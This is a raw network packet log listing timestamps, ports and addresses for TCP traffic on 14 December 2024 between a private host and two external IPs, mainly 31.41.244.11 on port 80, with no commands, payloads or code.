Dec 14, 2024 23:58:20.095308065 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.096210957 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.096263885 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.096344948 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.096400023 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.097289085 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.097351074 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.097435951 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.097584963 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.098416090 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.098475933 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.098545074 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.098596096 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.099510908 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.099581957 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.099654913 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.099709988 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.100574017 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.100630045 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.100753069 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.100810051 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.101699114 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.101767063 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.101835012 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.101888895 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.102772951 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.102829933 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.102922916 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.102976084 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.103895903 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.103954077 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.104042053 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.104129076 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.104535103 CET	443	49794	104.21.22.222	192.168.2.4
Dec 14, 2024 23:58:20.104742050 CET	49794	443	192.168.2.4	104.21.22.222
Dec 14, 2024 23:58:20.105027914 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.105087042 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.105154037 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.105406046 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.106193066 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.106250048 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.106363058 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.106379032 CET	49794	443	192.168.2.4	104.21.22.222
Dec 14, 2024 23:58:20.106431961 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.106434107 CET	443	49794	104.21.22.222	192.168.2.4
Dec 14, 2024 23:58:20.106945992 CET	443	49794	104.21.22.222	192.168.2.4
Dec 14, 2024 23:58:20.107198954 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.107270956 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.107352972 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.107409000 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.108134031 CET	49794	443	192.168.2.4	104.21.22.222
Dec 14, 2024 23:58:20.108134031 CET	49794	443	192.168.2.4	104.21.22.222
Dec 14, 2024 23:58:20.108330011 CET	443	49794	104.21.22.222	192.168.2.4
Dec 14, 2024 23:58:20.108522892 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.108577967 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.108689070 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.108741045 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.109363079 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.109438896 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.109518051 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.109575987 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.110480070 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.110534906 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.110614061 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.110663891 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.111561060 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.111634016 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.111715078 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.111766100 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.112654924 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.112763882 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.112831116 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.112916946 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.113771915 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.113827944 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.113908052 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.113960981 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.114854097 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.114905119 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.114986897 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.115039110 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.115951061 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.116008043 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.116121054 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.116229057 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.117063046 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.117149115 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.117214918 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.117264986 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.118190050 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.118247032 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.118325949 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.118380070 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.119229078 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.119282961 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.119385958 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.119442940 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.120352030 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.120409012 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.120490074 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.120536089 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.121443987 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.121613026 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.121658087 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.122534990 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.122586966 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.122677088 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.122735977 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.123693943 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.123748064 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.123815060 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.123864889 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.124754906 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.124808073 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.124922991 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.124974966 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.125799894 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.125902891 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.260627031 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.260691881 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.260750055 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.260919094 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.261060953 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.261123896 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.261188030 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.261234045 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.261984110 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.262037039 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.262151957 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.262203932 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.263032913 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.263084888 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.263184071 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.263237000 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.264183044 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.264236927 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.264317989 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.264373064 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.265211105 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.265265942 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.265346050 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.265414000 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.266340971 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.266391993 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.266443014 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.266494036 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.267407894 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.267461061 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.267528057 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.267577887 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.268507004 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.268559933 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.268627882 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.268680096 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.269608974 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.269664049 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.269730091 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.269782066 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.270714045 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.270771027 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.270838976 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.270889997 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.271841049 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.271894932 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.271961927 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.272016048 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.272897959 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.272950888 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.273019075 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.273068905 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.274008989 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.274063110 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.274142981 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.274205923 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.275094986 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.275156021 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.275216103 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.275266886 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.276184082 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.276237011 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.276304960 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.276355028 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.277339935 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.277400017 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.277458906 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.277515888 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.278409004 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.278462887 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.278522015 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.278642893 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.279501915 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.279556036 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.279623032 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.279675007 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.280595064 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.280648947 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.280714989 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.280767918 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.281672955 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.281725883 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.281809092 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.281858921 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.282759905 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.282814026 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.282881021 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.282932043 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.283871889 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.283925056 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.284006119 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.284054995 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.284991980 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.285048008 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.285111904 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.285167933 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.286088943 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.286145926 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.286207914 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.286261082 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.287198067 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.287250996 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.287347078 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.287419081 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.288256884 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.288310051 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.288391113 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.288441896 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.289366007 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.289418936 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.289474964 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.289544106 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.290452003 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.290504932 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.290570021 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.290621996 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.291524887 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.291588068 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.291655064 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.291704893 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.292665005 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.292721033 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.292788982 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.292840004 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.293804884 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.293859959 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.293926954 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.293988943 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.294878006 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.294933081 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.295001030 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.295094967 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.295938015 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.295990944 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.296060085 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.296217918 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.297040939 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.297092915 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.297156096 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.297207117 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.298182011 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.298234940 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.298285961 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.298336983 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.299217939 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.299308062 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.299391031 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.299438953 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.300318003 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.300405025 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.300477028 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.300530910 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.301409960 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.301564932 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.301575899 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.301611900 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.302524090 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.302576065 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.302644968 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.302695036 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.303617001 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.303669930 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.303750992 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.303817987 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.304712057 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.304764032 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.304843903 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.304897070 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.305808067 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.305860996 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.305941105 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.306010008 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.306931019 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.306986094 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.307053089 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.307117939 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.308003902 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.308059931 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.308125973 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.308254004 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.309129953 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.309186935 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.309267998 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.309320927 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.310199976 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.310254097 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.310373068 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.310426950 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.311295033 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.311343908 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.311424971 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.311475992 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.312402964 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.312526941 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.312558889 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.312608957 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.313483953 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.313539982 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.313620090 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.313781977 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.314606905 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.314659119 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.314737082 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.314791918 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.315745115 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.315805912 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.315841913 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.315908909 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.316807032 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.316863060 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.316926003 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.316976070 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.317862034 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.317914963 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.452555895 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.452631950 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.452634096 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.452685118 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.452861071 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.452912092 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.452961922 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.453345060 CET	49793	80	192.168.2.4	31.41.244.11
